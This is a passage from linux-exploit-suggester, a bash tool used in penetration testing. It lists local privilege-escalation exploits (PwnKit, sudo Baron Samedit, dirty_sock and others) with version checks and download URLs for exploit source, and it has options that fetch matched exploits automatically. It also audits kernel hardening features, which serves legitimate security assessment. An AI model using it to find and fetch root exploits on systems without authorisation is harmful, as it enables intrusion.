author: Denis Andzakovic
Comments: Distros use own versioning scheme. Manual verification needed.
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2018-14665]${txtrst} raptor_xorgy
Reqs: pkg=xorg-x11-server-Xorg,cmd:[ -u /usr/bin/Xorg ]
Tags: centos=7.4
Rank: 1
analysis-url: https://www.securepatterns.com/2018/10/cve-2018-14665-xorg-x-server.html
exploit-db: 45922
author: raptor
Comments: X.Org Server before 1.20.3 is vulnerable. Distros use own versioning scheme. Manual verification needed.
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2019-7304]${txtrst} dirty_sock
Reqs: pkg=snapd,ver<2.37,cmd:[ -S /run/snapd.socket ]
Tags: ubuntu=18.10,mint=19
Rank: 1
analysis-url: https://initblog.com/2019/dirty-sock/
exploit-db: 46361
exploit-db: 46362
src-url: https://github.com/initstring/dirty_sock/archive/master.zip
author: InitString
Comments: Distros use own versioning scheme. Manual verification needed.
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2019-10149]${txtrst} raptor_exim_wiz
Reqs: pkg=exim|exim4,ver>=4.87,ver<=4.91
Tags:
Rank: 1
analysis-url: https://www.qualys.com/2019/06/05/cve-2019-10149/return-wizard-rce-exim.txt
exploit-db: 46996
author: raptor
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2019-12181]${txtrst} Serv-U FTP Server
Reqs: cmd:[ -u /usr/local/Serv-U/Serv-U ]
Tags: debian=9
Rank: 1
analysis-url: https://blog.vastart.dev/2019/06/cve-2019-12181-serv-u-exploit-writeup.html
exploit-db: 47009
src-url: https://raw.githubusercontent.com/guywhataguy/CVE-2019-12181/master/servu-pe-cve-2019-12181.c
ext-url: https://raw.githubusercontent.com/bcoles/local-exploits/master/CVE-2019-12181/SUroot
author: Guy Levin (orginal exploit author); Brendan Coles (author of exploit update at 'ext-url')
Comments: Modified version at 'ext-url' uses bash exec technique, rather than compiling with gcc.
EOF
)
EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2019-18862]${txtrst} GNU Mailutils 2.0 <= 3.7 maidag url local root (CVE-2019-18862)
Reqs: cmd:[ -u /usr/local/sbin/maidag ]
Tags: 
Rank: 1
analysis-url: https://www.mike-gualtieri.com/posts/finding-a-decade-old-flaw-in-gnu-mailutils
ext-url: https://github.com/bcoles/local-exploits/raw/master/CVE-2019-18862/exploit.cron.sh
src-url: https://github.com/bcoles/local-exploits/raw/master/CVE-2019-18862/exploit.ldpreload.sh
author: bcoles
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2019-18634]${txtrst} sudo pwfeedback
Reqs: pkg=sudo,ver<1.8.31
Tags: mint=19
Rank: 1
analysis-url: https://dylankatz.com/Analysis-of-CVE-2019-18634/
src-url: https://github.com/saleemrashid/sudo-cve-2019-18634/raw/master/exploit.c
author: saleemrashid
Comments: sudo configuration requires pwfeedback to be enabled.
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2020-9470]${txtrst} Wing FTP Server <= 6.2.5 LPE
Reqs: cmd:[ -x /etc/init.d/wftpserver ]
Tags: ubuntu=18
Rank: 1
analysis-url: https://www.hooperlabs.xyz/disclosures/cve-2020-9470.php
src-url: https://www.hooperlabs.xyz/disclosures/cve-2020-9470.sh
exploit-db: 48154
author: Cary Cooper
Comments: Requires an administrator to login via the web interface.
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2021-3156]${txtrst} sudo Baron Samedit
Reqs: pkg=sudo,ver<1.9.5p2
Tags: mint=19,ubuntu=18|20, debian=10
Rank: 1
analysis-url: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
src-url: https://codeload.github.com/blasty/CVE-2021-3156/zip/main
author: blasty
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2021-3156]${txtrst} sudo Baron Samedit 2
Reqs: pkg=sudo,ver<1.9.5p2
Tags: centos=6|7|8,ubuntu=14|16|17|18|19|20, debian=9|10
Rank: 1
analysis-url: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
src-url: https://codeload.github.com/worawit/CVE-2021-3156/zip/main
author: worawit
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2017-5618]${txtrst} setuid screen v4.5.0 LPE
Reqs: pkg=screen,ver==4.5.0
Tags: 
Rank: 1
analysis-url: https://seclists.org/oss-sec/2017/q1/184
exploit-db: https://www.exploit-db.com/exploits/41154
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2021-4034]${txtrst} PwnKit
Reqs: pkg=polkit|policykit-1,ver<=0.105-31
Tags: ubuntu=10|11|12|13|14|15|16|17|18|19|20|21,debian=7|8|9|10|11,fedora,manjaro
Rank: 1
analysis-url: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
src-url: https://codeload.github.com/berdav/CVE-2021-4034/zip/main
author: berdav
EOF
)

###########################################################
## security related HW/kernel features
###########################################################
n=0

FEATURES[((n++))]=$(cat <<EOF
section: Mainline kernel protection mechanisms:
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Kernel Page Table Isolation (PTI) support
available: ver>=4.15
enabled: cmd:grep -Eqi '\spti' /proc/cpuinfo
analysis-url: https://github.com/mzet-/les-res/blob/master/features/pti.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: GCC stack protector support
available: CONFIG_HAVE_STACKPROTECTOR=y
analysis-url: https://github.com/mzet-/les-res/blob/master/features/stackprotector-regular.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: GCC stack protector STRONG support
available: CONFIG_STACKPROTECTOR_STRONG=y,ver>=3.14
analysis-url: https://github.com/mzet-/les-res/blob/master/features/stackprotector-strong.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Low address space to protect from user allocation
available: CONFIG_DEFAULT_MMAP_MIN_ADDR=[0-9]+
enabled: sysctl:vm.mmap_min_addr!=0
analysis-url: https://github.com/mzet-/les-res/blob/master/features/mmap_min_addr.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Prevent users from using ptrace to examine the memory and state of their processes
available: CONFIG_SECURITY_YAMA=y
enabled: sysctl:kernel.yama.ptrace_scope!=0
analysis-url: https://github.com/mzet-/les-res/blob/master/features/yama_ptrace_scope.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Restrict unprivileged access to kernel syslog
available: CONFIG_SECURITY_DMESG_RESTRICT=y,ver>=2.6.37
enabled: sysctl:kernel.dmesg_restrict!=0
analysis-url: https://github.com/mzet-/les-res/blob/master/features/dmesg_restrict.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Randomize the address of the kernel image (KASLR)
available: CONFIG_RANDOMIZE_BASE=y
analysis-url: https://github.com/mzet-/les-res/blob/master/features/kaslr.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Hardened user copy support
available: CONFIG_HARDENED_USERCOPY=y
analysis-url: https://github.com/mzet-/les-res/blob/master/features/hardened_usercopy.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Make kernel text and rodata read-only
available: CONFIG_STRICT_KERNEL_RWX=y
analysis-url: https://github.com/mzet-/les-res/blob/master/features/strict_kernel_rwx.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Set loadable kernel module data as NX and text as RO
available: CONFIG_STRICT_MODULE_RWX=y
analysis-url: https://github.com/mzet-/les-res/blob/master/features/strict_module_rwx.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: BUG() conditions reporting
available: CONFIG_BUG=y
analysis-url: https://github.com/mzet-/les-res/blob/master/features/bug.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Additional 'cred' struct checks
available: CONFIG_DEBUG_CREDENTIALS=y
analysis-url: https://github.com/mzet-/les-res/blob/master/features/debug_credentials.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Sanity checks for notifier call chains
available: CONFIG_DEBUG_NOTIFIERS=y
analysis-url: https://github.com/mzet-/les-res/blob/master/features/debug_notifiers.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Extended checks for linked-lists walking
available: CONFIG_DEBUG_LIST=y
analysis-url: https://github.com/mzet-/les-res/blob/master/features/debug_list.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Checks on scatter-gather tables
available: CONFIG_DEBUG_SG=y
analysis-url: https://github.com/mzet-/les-res/blob/master/features/debug_sg.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Checks for data structure corruptions
available: CONFIG_BUG_ON_DATA_CORRUPTION=y
analysis-url: https://github.com/mzet-/les-res/blob/master/features/bug_on_data_corruption.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Checks for a stack overrun on calls to 'schedule'
available: CONFIG_SCHED_STACK_END_CHECK=y
analysis-url: https://github.com/mzet-/les-res/blob/master/features/sched_stack_end_check.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Freelist order randomization on new pages creation
available: CONFIG_SLAB_FREELIST_RANDOM=y
analysis-url: https://github.com/mzet-/les-res/blob/master/features/slab_freelist_random.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Freelist metadata hardening
available: CONFIG_SLAB_FREELIST_HARDENED=y
analysis-url: https://github.com/mzet-/les-res/blob/master/features/slab_freelist_hardened.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Allocator validation checking
available: CONFIG_SLUB_DEBUG_ON=y,cmd:! grep 'slub_debug=-' /proc/cmdline
analysis-url: https://github.com/mzet-/les-res/blob/master/features/slub_debug.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Virtually-mapped kernel stacks with guard pages
available: CONFIG_VMAP_STACK=y
analysis-url: https://github.com/mzet-/les-res/blob/master/features/vmap_stack.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Pages poisoning after free_pages() call
available: CONFIG_PAGE_POISONING=y
enabled: cmd: grep 'page_poison=1' /proc/cmdline
analysis-url: https://github.com/mzet-/les-res/blob/master/features/page_poisoning.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Using 'refcount_t' instead of 'atomic_t'
available: CONFIG_REFCOUNT_FULL=y
analysis-url: https://github.com/mzet-/les-res/blob/master/features/refcount_full.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Hardening common str/mem functions against buffer overflows
available: CONFIG_FORTIFY_SOURCE=y
analysis-url: https://github.com/mzet-/les-res/blob/master/features/fortify_source.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Restrict /dev/mem access
available: CONFIG_STRICT_DEVMEM=y
analysis-url: https://github.com/mzet-/les-res/blob/master/features/strict_devmem.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Restrict I/O access to /dev/mem
available: CONFIG_IO_STRICT_DEVMEM=y
analysis-url: https://github.com/mzet-/les-res/blob/master/features/io_strict_devmem.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
section: Hardware-based protection features:
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Supervisor Mode Execution Protection (SMEP) support
available: ver>=3.0
enabled: cmd:grep -qi smep /proc/cpuinfo
analysis-url: https://github.com/mzet-/les-res/blob/master/features/smep.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Supervisor Mode Access Prevention (SMAP) support
available: ver>=3.7
enabled: cmd:grep -qi smap /proc/cpuinfo
analysis-url: https://github.com/mzet-/les-res/blob/master/features/smap.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
section: 3rd party kernel protection mechanisms:
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Grsecurity
available: CONFIG_GRKERNSEC=y
enabled: cmd:test -c /dev/grsec
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: PaX
available: CONFIG_PAX=y
enabled: cmd:test -x /sbin/paxctl
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Linux Kernel Runtime Guard (LKRG) kernel module
enabled: cmd:test -d /proc/sys/lkrg
analysis-url: https://github.com/mzet-/les-res/blob/master/features/lkrg.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
section: Attack Surface:
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: User namespaces for unprivileged accounts
available: CONFIG_USER_NS=y
enabled: sysctl:kernel.unprivileged_userns_clone==1
analysis-url: https://github.com/mzet-/les-res/blob/master/features/user_ns.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Unprivileged access to bpf() system call
available: CONFIG_BPF_SYSCALL=y
enabled: sysctl:kernel.unprivileged_bpf_disabled!=1
analysis-url: https://github.com/mzet-/les-res/blob/master/features/bpf_syscall.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Syscalls filtering
available: CONFIG_SECCOMP=y
enabled: cmd:grep -iw Seccomp /proc/self/status | awk '{print \$2}'
analysis-url: https://github.com/mzet-/les-res/blob/master/features/bpf_syscall.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Support for /dev/mem access
available: CONFIG_DEVMEM=y
analysis-url: https://github.com/mzet-/les-res/blob/master/features/devmem.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Support for /dev/kmem access
available: CONFIG_DEVKMEM=y
analysis-url: https://github.com/mzet-/les-res/blob/master/features/devkmem.md
EOF
)


version() {
    echo "linux-exploit-suggester "$VERSION", mzet, https://z-labs.eu, March 2019"
}

usage() {
    echo "LES ver. $VERSION (https://github.com/mzet-/linux-exploit-suggester) by @_mzet_"
    echo
    echo "Usage: linux-exploit-suggester.sh [OPTIONS]"
    echo
    echo " -V | --version               - print version of this script"
    echo " -h | --help                  - print this help"
    echo " -k | --kernel <version>      - provide kernel version"
    echo " -u | --uname <string>        - provide 'uname -a' string"
    echo " --skip-more-checks           - do not perform additional checks (kernel config, sysctl) to determine if exploit is applicable"
    echo " --skip-pkg-versions          - skip checking for exact userspace package version (helps to avoid false negatives)"
    echo " -p | --pkglist-file <file>   - provide file with 'dpkg -l' or 'rpm -qa' command output"
    echo " --cvelist-file <file>        - provide file with Linux kernel CVEs list"
    echo " --checksec                   - list security related features for your HW/kernel"
    echo " -s | --fetch-sources         - automatically downloads source for matched exploit"
    echo " -b | --fetch-binaries        - automatically downloads binary for matched exploit if available"
    echo " -f | --full                  - show full info about matched exploit"
    echo " -g | --short                 - show shorten info about matched exploit"
    echo " --kernelspace-only           - show only kernel vulnerabilities"
    echo " --userspace-only             - show only userspace vulnerabilities"
    echo " -d | --show-dos              - show also DoSes in results"
}

exitWithErrMsg() {
    echo "$1" 1>&2
    exit 1
}

# extracts all information from output of 'uname -a' command
parseUname() {
    local uname=$1

    KERNEL=$(echo "$uname" | awk '{print $3}' | cut -d '-' -f 1)
    KERNEL_ALL=$(echo "$uname" | awk '{print $3}')
    ARCH=$(echo "$uname" | awk '{print $(NF-1)}')

    OS=""
    echo "$uname" | grep -q -i 'deb' && OS="debian"
    echo "$uname" | grep -q -i 'ubuntu' && OS="ubuntu"
    echo "$uname" | grep -q -i '\-ARCH' && OS="arch"
    echo "$uname" | grep -q -i '\-deepin' && OS="deepin"
    echo "$uname" | grep -q -i '\-MANJARO' && OS="manjaro"
    echo "$uname" | grep -q -i '\.fc' && OS="fedora"
    echo "$uname" | grep -q -i '\.el' && OS="RHEL"
    echo "$uname" | grep -q -i '\.mga' && OS="mageia"

    # 'uname -a' output doesn't contain distribution number (at least not in case of all distros)
}

getPkgList() {
    local distro=$1
    local pkglist_file=$2
    
    # take package listing from provided file & detect if it's 'rpm -qa' listing or 'dpkg -l' or 'pacman -Q' listing of not recognized listing
    if [ "$opt_pkglist_file" = "true" -a -e "$pkglist_file" ]; then

        # ubuntu/debian package listing file
        if [ $(head -1 "$pkglist_file" | grep 'Desired=Unknown/Install/Remove/Purge/Hold') ]; then
            PKG_LIST=$(cat "$pkglist_file" | awk '{print $2"-"$3}' | sed 's/:amd64//g')

            OS="debian"
            [ "$(grep ubuntu "$pkglist_file")" ] && OS="ubuntu"
        # redhat package listing file
        elif [ "$(grep -E '\.el[1-9]+[\._]' "$pkglist_file" | head -1)" ]; then
            PKG_LIST=$(cat "$pkglist_file")
            OS="RHEL"
        # fedora package listing file
        elif [ "$(grep -E '\.fc[1-9]+'i "$pkglist_file" | head -1)" ]; then
            PKG_LIST=$(cat "$pkglist_file")
            OS="fedora"
        # mageia package listing file
        elif [ "$(grep -E '\.mga[1-9]+' "$pkglist_file" | head -1)" ]; then
            PKG_LIST=$(cat "$pkglist_file")
            OS="mageia"
        # pacman package listing file
        elif [ "$(grep -E '\ [0-9]+\.' "$pkglist_file" | head -1)" ]; then
            PKG_LIST=$(cat "$pkglist_file" | awk '{print $1"-"$2}')
            OS="arch"
        # file not recognized - skipping
        else
            PKG_LIST=""
        fi

    elif [ "$distro" = "debian" -o "$distro" = "ubuntu" -o "$distro" = "deepin" ]; then
        PKG_LIST=$(dpkg -l | awk '{print $2"-"$3}' | sed 's/:amd64//g')
    elif [ "$distro" = "RHEL" -o "$distro" = "fedora" -o "$distro" = "mageia" ]; then
        PKG_LIST=$(rpm -qa)
    elif [ "$distro" = "arch" -o "$distro" = "manjaro" ]; then
        PKG_LIST=$(pacman -Q | awk '{print $1"-"$2}')
    elif [ -x /usr/bin/equery ]; then
        PKG_LIST=$(/usr/bin/equery --quiet list '*' -F '$name:$version' | cut -d/ -f2- | awk '{print $1":"$2}')
    else
        # packages listing not available
        PKG_LIST=""
    fi
}

# from: https://stackoverflow.com/questions/4023830/how-compare-two-strings-in-dot-separated-version-format-in-bash
verComparision() {

    if [[ $1 == $2 ]]
    then
        return 0
    fi

    local IFS=.
    local i ver1=($1) ver2=($2)

    # fill empty fields in ver1 with zeros
    for ((i=${#ver1[@]}; i<${#ver2[@]}; i++))
    do
        ver1[i]=0
    done

    for ((i=0; i<${#ver1[@]}; i++))
    do
        if [[ -z ${ver2[i]} ]]
        then
            # fill empty fields in ver2 with zeros
            ver2[i]=0
        fi
        if ((10#${ver1[i]} > 10#${ver2[i]}))
        then
            return 1
        fi
        if ((10#${ver1[i]} < 10#${ver2[i]}))
        then
            return 2
        fi
    done

    return 0
}

doVersionComparision() {
    local reqVersion="$1"
    local reqRelation="$2"
    local currentVersion="$3"

    verComparision $currentVersion $reqVersion
    case $? in
        0) currentRelation='=';;
        1) currentRelation='>';;
        2) currentRelation='<';;
    esac

    if [ "$reqRelation" == "=" ]; then
        [ $currentRelation == "=" ] && return 0
    elif [ "$reqRelation" == ">" ]; then
        [ $currentRelation == ">" ] && return 0
    elif [ "$reqRelation" == "<" ]; then
        [ $currentRelation == "<" ] && return 0
    elif [ "$reqRelation" == ">=" ]; then
        [ $currentRelation == "=" ] && return 0
        [ $currentRelation == ">" ] && return 0
    elif [ "$reqRelation" == "<=" ]; then
        [ $currentRelation == "=" ] && return 0
        [ $currentRelation == "<" ] && return 0
    fi
}

compareValues() {
    curVal=$1
    val=$2
    sign=$3

    if [ "$sign" == "==" ]; then
        [ "$val" == "$curVal" ] && return 0
    elif [ "$sign" == "!=" ]; then
        [ "$val" != "$curVal" ] && return 0
    fi

    return 1
}

checkRequirement() {
    #echo "Checking requirement: $1"
    local IN="$1"
    local pkgName="${2:4}"

    if [[ "$IN" =~ ^pkg=.*$ ]]; then

        # always true for Linux OS
        [ ${pkgName} == "linux-kernel" ] && return 0

        # verify if package is present 
        pkg=$(echo "$PKG_LIST" | grep -E -i "^$pkgName-[0-9]+" | head -1)
        if [ -n "$pkg" ]; then
            return 0
        fi

    elif [[ "$IN" =~ ^ver.*$ ]]; then
        version="${IN//[^0-9.]/}"
        rest="${IN#ver}"
        operator=${rest%$version}

        if [ "$pkgName" == "linux-kernel" -o "$opt_checksec_mode" == "true" ]; then

            # for --cvelist-file mode skip kernel version comparision
            [ "$opt_cvelist_file" = "true" ] && return 0

            doVersionComparision $version $operator $KERNEL && return 0
        else
            # extract package version and check if requiremnt is true
            pkg=$(echo "$PKG_LIST" | grep -E -i "^$pkgName-[0-9]+" | head -1)

            # skip (if run with --skip-pkg-versions) version checking if package with given name is installed
            [ "$opt_skip_pkg_versions" = "true" -a -n "$pkg" ] && return 0

            # versioning:
            #echo "pkg: $pkg"
            pkgVersion=$(echo "$pkg" | grep -E -i -o -e '-[\.0-9\+:p]+[-\+]' | cut -d':' -f2 | sed 's/[\+-]//g' | sed 's/p[0-9]//g')
            #echo "version: $pkgVersion"
            #echo "operator: $operator"
            #echo "required version: $version"
            #echo
            doVersionComparision $version $operator $pkgVersion && return 0
        fi
    elif [[ "$IN" =~ ^x86_64$ ]] && [ "$ARCH" == "x86_64" -o "$ARCH" == "" ]; then
        return 0
    elif [[ "$IN" =~ ^x86$ ]] && [ "$ARCH" == "i386" -o "$ARCH" == "i686" -o "$ARCH" == "" ]; then
        return 0
    elif [[ "$IN" =~ ^CONFIG_.*$ ]]; then

        # skip if check is not applicable (-k or --uname or -p set) or if user said so (--skip-more-checks)
        [ "$opt_skip_more_checks" = "true" ] && return 0

        # if kernel config IS available:
        if [ -n "$KCONFIG" ]; then
            if $KCONFIG | grep -E -qi $IN; then
                return 0;
            # required option wasn't found, exploit is not applicable
            else
                return 1;
            fi
        # config is not available
        else
            return 0;
        fi
    elif [[ "$IN" =~ ^sysctl:.*$ ]]; then

        # skip if check is not applicable (-k or --uname or -p modes) or if user said so (--skip-more-checks)
        [ "$opt_skip_more_checks" = "true" ] && return 0

        sysctlCondition="${IN:7}"

        # extract sysctl entry, relation sign and required value
        if echo $sysctlCondition | grep -qi "!="; then
            sign="!="
        elif echo $sysctlCondition | grep -qi "=="; then
            sign="=="
        else
            exitWithErrMsg "Wrong sysctl condition. There is syntax error in your features DB. Aborting."
        fi
        val=$(echo "$sysctlCondition" | awk -F "$sign" '{print $2}')
        entry=$(echo "$sysctlCondition" | awk -F "$sign" '{print $1}')

        # get current setting of sysctl entry
        curVal=$(/sbin/sysctl -a 2> /dev/null | grep "$entry" | awk -F'=' '{print $2}')

        # special case for --checksec mode: return 2 if there is no such switch in sysctl
        [ -z "$curVal" -a "$opt_checksec_mode" = "true" ] && return 2

        # for other modes: skip if there is no such switch in sysctl
        [ -z "$curVal" ] && return 0

        # compare & return result
        compareValues $curVal $val $sign && return 0

    elif [[ "$IN" =~ ^cmd:.*$ ]]; then

        # skip if check is not applicable (-k or --uname or -p modes) or if user said so (--skip-more-checks)
        [ "$opt_skip_more_checks" = "true" ] && return 0

        cmd="${IN:4}"
        if eval "${cmd}"; then
            return 0
        fi
    fi

    return 1
}

getKernelConfig() {

    if [ -f /proc/config.gz ] ; then
        KCONFIG="zcat /proc/config.gz"
    elif [ -f /boot/config-`uname -r` ] ; then
        KCONFIG="cat /boot/config-`uname -r`"
    elif [ -f "${KBUILD_OUTPUT:-/usr/src/linux}"/.config ] ; then
        KCONFIG="cat ${KBUILD_OUTPUT:-/usr/src/linux}/.config"
    else
        KCONFIG=""
    fi
}

checksecMode() {

    MODE=0

    # start analysis
for FEATURE in "${FEATURES[@]}"; do

    # create array from current exploit here doc and fetch needed lines
    i=0
    # ('-r' is used to not interpret backslash used for bash colors)
    while read -r line
    do
        arr[i]="$line"
        i=$((i + 1))
    done <<< "$FEATURE"

	# modes: kernel-feature (1) | hw-feature (2) | 3rdparty-feature (3) | attack-surface (4)
    NAME="${arr[0]}"
    PRE_NAME="${NAME:0:8}"
    NAME="${NAME:9}"
    if [ "${PRE_NAME}" = "section:" ]; then
		# advance to next MODE
		MODE=$(($MODE + 1))

        echo
        echo -e "${bldwht}${NAME}${txtrst}"
        echo
        continue
    fi

    AVAILABLE="${arr[1]}" && AVAILABLE="${AVAILABLE:11}"
    ENABLE=$(echo "$FEATURE" | grep "enabled: " | awk -F'ed: ' '{print $2}')
    analysis_url=$(echo "$FEATURE" | grep "analysis-url: " | awk '{print $2}')

    # split line with availability requirements & loop thru all availability reqs one by one & check whether it is met
    IFS=',' read -r -a array <<< "$AVAILABLE"
    AVAILABLE_REQS_NUM=${#array[@]}
    AVAILABLE_PASSED_REQ=0
	CONFIG=""
    for REQ in "${array[@]}"; do

		# find CONFIG_ name (if present) for current feature (only for display purposes)
		if [ -z "$CONFIG" ]; then
			config=$(echo "$REQ" | grep "CONFIG_")
			[ -n "$config" ] && CONFIG="($(echo $REQ | cut -d'=' -f1))"
		fi

        if (checkRequirement "$REQ"); then
            AVAILABLE_PASSED_REQ=$(($AVAILABLE_PASSED_REQ + 1))
        else
            break
        fi
    done

    # split line with enablement requirements & loop thru all enablement reqs one by one & check whether it is met
    ENABLE_PASSED_REQ=0
    ENABLE_REQS_NUM=0
    noSysctl=0
    if [ -n "$ENABLE" ]; then
        IFS=',' read -r -a array <<< "$ENABLE"
        ENABLE_REQS_NUM=${#array[@]}
        for REQ in "${array[@]}"; do
            cmdStdout=$(checkRequirement "$REQ")
            retVal=$?
            if [ $retVal -eq 0 ]; then
                ENABLE_PASSED_REQ=$(($ENABLE_PASSED_REQ + 1))
            elif [ $retVal -eq 2 ]; then
            # special case: sysctl entry is not present on given system: signal it as: N/A
                noSysctl=1
                break
            else
                break
            fi
        done
    fi

    feature=$(echo "$FEATURE" | grep "feature: " | cut -d' ' -f 2-)

    if [ -n "$cmdStdout" ]; then
        if [ $cmdStdout -eq 0 ]; then
            state="[ ${txtred}Set to $cmdStdout${txtrst} ]"
			cmdStdout=""
        else
            state="[ ${txtgrn}Set to $cmdStdout${txtrst} ]"
			cmdStdout=""
        fi
    else

	unknown="[ ${txtgray}Unknown${txtrst}  ]"

	# for 3rd party (3) mode display "N/A" or "Enabled"
	if [ $MODE -eq 3 ]; then
            enabled="[ ${txtgrn}Enabled${txtrst}   ]"
            disabled="[   ${txtgray}N/A${txtrst}    ]"

        # for attack-surface (4) mode display "Locked" or "Exposed"
        elif [ $MODE -eq 4 ]; then
           enabled="[ ${txtred}Exposed${txtrst}  ]"
           disabled="[ ${txtgrn}Locked${txtrst}   ]"

	# other modes" "Disabled" / "Enabled"
	else
		enabled="[ ${txtgrn}Enabled${txtrst}  ]"
		disabled="[ ${txtred}Disabled${txtrst} ]"
	fi

	if [ -z "$KCONFIG" -a "$ENABLE_REQS_NUM" = 0 ]; then
	    state=$unknown
    elif [ $AVAILABLE_PASSED_REQ -eq $AVAILABLE_REQS_NUM -a $ENABLE_PASSED_REQ -eq $ENABLE_REQS_NUM ]; then
        state=$enabled
    else
        state=$disabled
	fi

    fi

    echo -e " $state $feature ${wht}${CONFIG}${txtrst}"
    [ -n "$analysis_url" ] && echo -e "              $analysis_url"
    echo

done

}

displayExposure() {
    RANK=$1

    if [ "$RANK" -ge 6 ]; then
        echo "highly probable"
    elif [ "$RANK" -ge 3 ]; then
        echo "probable"
    else
        echo "less probable"
    fi
}

# parse command line parameters
ARGS=$(getopt --options $SHORTOPTS  --longoptions $LONGOPTS -- "$@")
[ $? != 0 ] && exitWithErrMsg "Aborting."

eval set -- "$ARGS"

while true; do
    case "$1" in
        -u|--uname)
            shift
            UNAME_A="$1"
            opt_uname_string=true
            ;;
        -V|--version)
            version
            exit 0
            ;;
        -h|--help)
            usage 
            exit 0
            ;;
        -f|--full)
            opt_full=true
            ;;
        -g|--short)
            opt_summary=true
            ;;
        -b|--fetch-binaries)
            opt_fetch_bins=true
            ;;
        -s|--fetch-sources)
            opt_fetch_srcs=true
            ;;
        -k|--kernel)
            shift
            KERNEL="$1"
            opt_kernel_version=true
            ;;
        -d|--show-dos)
            opt_show_dos=true
            ;;
        -p|--pkglist-file)
            shift
            PKGLIST_FILE="$1"
            opt_pkglist_file=true
            ;;
        --cvelist-file)
            shift
            CVELIST_FILE="$1"
            opt_cvelist_file=true
            ;;
        --checksec)
            opt_checksec_mode=true
            ;;
        --kernelspace-only)
            opt_kernel_only=true
            ;;
        --userspace-only)
            opt_userspace_only=true
            ;;
        --skip-more-checks)
            opt_skip_more_checks=true
            ;;
        --skip-pkg-versions)
            opt_skip_pkg_versions=true
            ;;
        *)
            shift
            if [ "$#" != "0" ]; then
                exitWithErrMsg "Unknown option '$1'. Aborting."
            fi
            break
            ;;
    esac
    shift
done

# check Bash version (associative arrays need Bash in version 4.0+)
if ((BASH_VERSINFO[0] < 4)); then
    exitWithErrMsg "Script needs Bash in version 4.0 or newer. Aborting."
fi

# exit if both --kernel and --uname are set
[ "$opt_kernel_version" = "true" ] && [ $opt_uname_string = "true" ] && exitWithErrMsg "Switches -u|--uname and -k|--kernel are mutually exclusive. Aborting."

# exit if both --full and --short are set
[ "$opt_full" = "true" ] && [ $opt_summary = "true" ] && exitWithErrMsg "Switches -f|--full and -g|--short are mutually exclusive. Aborting."

# --cvelist-file mode is standalone mode and is not applicable when one of -k | -u | -p | --checksec switches are set
if [ "$opt_cvelist_file" = "true" ]; then
    [ ! -e "$CVELIST_FILE" ] && exitWithErrMsg "Provided CVE list file does not exists. Aborting."
    [ "$opt_kernel_version" = "true" ] && exitWithErrMsg "Switches -k|--kernel and --cvelist-file are mutually exclusive. Aborting."
    [ "$opt_uname_string" = "true" ] && exitWithErrMsg "Switches -u|--uname and --cvelist-file are mutually exclusive. Aborting."
    [ "$opt_pkglist_file" = "true" ] && exitWithErrMsg "Switches -p|--pkglist-file and --cvelist-file are mutually exclusive. Aborting."
fi

